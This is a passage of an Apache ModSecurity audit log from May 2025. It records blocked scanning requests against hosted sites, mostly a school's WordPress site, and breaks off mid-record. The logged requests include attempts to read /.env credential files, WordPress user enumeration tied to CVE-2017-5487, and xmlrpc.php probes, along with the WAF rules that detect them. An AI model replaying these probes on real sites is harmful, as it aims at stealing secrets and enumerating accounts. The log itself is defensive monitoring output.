Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a93c252-Z-- --88e11d79-A-- [10/May/2025:22:39:07 +0700] aB9zG9r9PbfRBMhzxmQWiQAAAFU 103.236.140.4 47728 103.236.140.4 8181 --88e11d79-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 64.227.70.2 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --88e11d79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88e11d79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746891547564895 618 (- - -) Stopwatch2: 1746891547564895 618; combined=256, p1=187, p2=0, p3=0, p4=0, p5=68, sr=47, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88e11d79-Z-- --ebaf3310-A-- [10/May/2025:22:41:42 +0700] aB9ztsi6w7GTj2w44Z5gHwAAANA 103.236.140.4 53986 103.236.140.4 8181 --ebaf3310-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.40.93.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.40.93.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ebaf3310-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebaf3310-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746891702700183 2718 (- - -) Stopwatch2: 1746891702700183 2718; combined=1400, p1=418, p2=959, p3=0, p4=0, p5=23, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebaf3310-Z-- --7838452f-A-- [10/May/2025:22:48:20 +0700] aB91RMi6w7GTj2w44Z5mMwAAAMM 103.236.140.4 41142 103.236.140.4 8181 --7838452f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.72.65.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.72.65.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7838452f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7838452f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892100801611 3049 (- - -) Stopwatch2: 1746892100801611 3049; combined=1595, p1=479, p2=1089, p3=0, p4=0, p5=27, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7838452f-Z-- --5df7bd4c-A-- [10/May/2025:22:49:56 +0700] aB91pBLuBiaF9R054QAqeAAAAAY 103.236.140.4 44974 103.236.140.4 8181 --5df7bd4c-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 159.89.174.87 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 159.89.174.87 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --5df7bd4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5df7bd4c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746892196439877 577 (- - -) Stopwatch2: 1746892196439877 577; combined=209, p1=183, p2=0, p3=0, p4=0, p5=26, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5df7bd4c-Z-- --341f4767-A-- [10/May/2025:22:55:23 +0700] aB9266uC4AqLGUOyzyW2UgAAAII 103.236.140.4 58424 103.236.140.4 8181 --341f4767-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --341f4767-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --341f4767-H-- Message: Access denied with code 403 (phase 2). 
Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892523796374 3609 (- - -) Stopwatch2: 1746892523796374 3609; combined=1886, p1=530, p2=1327, p3=0, p4=0, p5=29, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --341f4767-Z-- --a96c8c67-A-- [10/May/2025:22:55:28 +0700] aB928Mi6w7GTj2w44Z5s7AAAANc 103.236.140.4 58614 103.236.140.4 8181 --a96c8c67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a96c8c67-C-- demo.sayHello --a96c8c67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a96c8c67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892528103192 4824 (- - -) Stopwatch2: 1746892528103192 4824; combined=3453, p1=498, p2=2763, p3=29, p4=29, p5=78, sr=60, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a96c8c67-Z-- --b760b83f-A-- [10/May/2025:22:55:36 +0700] aB92-Nr9PbfRBMhzxmQmtgAAAEg 103.236.140.4 58978 103.236.140.4 8181 --b760b83f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b760b83f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b760b83f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892536842919 2677 (- - -) Stopwatch2: 1746892536842919 2677; combined=1177, p1=388, p2=694, p3=0, p4=0, p5=95, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b760b83f-Z-- --32886176-A-- [10/May/2025:22:55:36 +0700] aB92-Nr9PbfRBMhzxmQmuAAAAFQ 103.236.140.4 58982 103.236.140.4 8181 --32886176-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --32886176-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32886176-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892536879304 2642 (- - -) Stopwatch2: 1746892536879304 2642; combined=1419, p1=447, p2=940, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32886176-Z-- --950c0d1b-A-- [10/May/2025:22:55:46 +0700] aB93Atr9PbfRBMhzxmQm4gAAAEw 103.236.140.4 59364 103.236.140.4 8181 --950c0d1b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --950c0d1b-C-- demo.sayHello --950c0d1b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --950c0d1b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892546281821 5128 (- - -) Stopwatch2: 1746892546281821 5128; combined=3871, p1=492, p2=3190, p3=27, p4=30, p5=78, sr=60, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --950c0d1b-Z-- --96c38d7c-A-- [10/May/2025:22:55:46 +0700] aB93AhLuBiaF9R054QAw3gAAABA 103.236.140.4 59384 103.236.140.4 8181 --96c38d7c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --96c38d7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96c38d7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892546689297 2638 (- - -) Stopwatch2: 1746892546689297 2638; combined=1194, p1=383, p2=781, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96c38d7c-Z-- --6c0b751f-A-- [10/May/2025:22:55:46 +0700] aB93AhLuBiaF9R054QAw3wAAABQ 103.236.140.4 59386 103.236.140.4 8181 --6c0b751f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c0b751f-C-- demo.sayHello --6c0b751f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c0b751f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892546703251 4633 (- - -) Stopwatch2: 1746892546703251 4633; combined=3394, p1=418, p2=2792, p3=31, p4=31, p5=72, sr=58, sw=50, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c0b751f-Z-- --85f8787c-A-- [10/May/2025:22:55:50 +0700] aB93Btr9PbfRBMhzxmQm8QAAAFc 103.236.140.4 59566 103.236.140.4 8181 --85f8787c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --85f8787c-C-- demo.sayHello --85f8787c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --85f8787c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892550546164 4116 (- - -) Stopwatch2: 1746892550546164 4116; combined=2887, p1=398, p2=2313, p3=27, p4=25, p5=72, sr=49, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85f8787c-Z-- --9dc11e13-A-- [10/May/2025:22:56:16 +0700] aB93IKuC4AqLGUOyzyW3IgAAAJA 103.236.140.4 60586 103.236.140.4 8181 --9dc11e13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9dc11e13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9dc11e13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892576150486 3218 (- - -) Stopwatch2: 1746892576150486 3218; combined=1372, p1=448, p2=891, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9dc11e13-Z-- --f18f695c-A-- [10/May/2025:22:56:23 +0700] aB93J8i6w7GTj2w44Z5t3gAAAMU 103.236.140.4 60906 103.236.140.4 8181 --f18f695c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f18f695c-C-- demo.sayHello --f18f695c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f18f695c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892583685385 5214 (- - -) Stopwatch2: 1746892583685385 5214; combined=3819, p1=516, p2=2952, p3=27, p4=31, p5=158, sr=72, sw=135, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f18f695c-Z-- --3b763126-A-- [10/May/2025:22:57:24 +0700] aB93ZKuC4AqLGUOyzyW4iQAAAIM 103.236.140.4 35074 103.236.140.4 8181 --3b763126-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b763126-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b763126-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892644559251 2790 (- - -) Stopwatch2: 1746892644559251 2790; combined=1223, p1=412, p2=782, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b763126-Z-- --303eb971-A-- [10/May/2025:22:57:29 +0700] aB93aRLuBiaF9R054QAyKwAAABU 103.236.140.4 35264 103.236.140.4 8181 --303eb971-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --303eb971-C-- demo.sayHello --303eb971-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --303eb971-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892649463949 4937 (- - -) Stopwatch2: 1746892649463949 4937; combined=3372, p1=608, p2=2588, p3=24, p4=25, p5=73, sr=84, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --303eb971-Z-- --ac894f32-A-- [10/May/2025:22:59:41 +0700] aB937ci6w7GTj2w44Z5xYQAAAM8 103.236.140.4 40714 103.236.140.4 8181 --ac894f32-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ac894f32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac894f32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892781759339 2632 (- - -) Stopwatch2: 1746892781759339 2632; combined=1120, p1=392, p2=703, p3=0, p4=0, p5=25, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac894f32-Z-- --3b772252-A-- [10/May/2025:22:59:48 +0700] aB939Nr9PbfRBMhzxmQqVwAAAEw 103.236.140.4 40980 103.236.140.4 8181 --3b772252-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 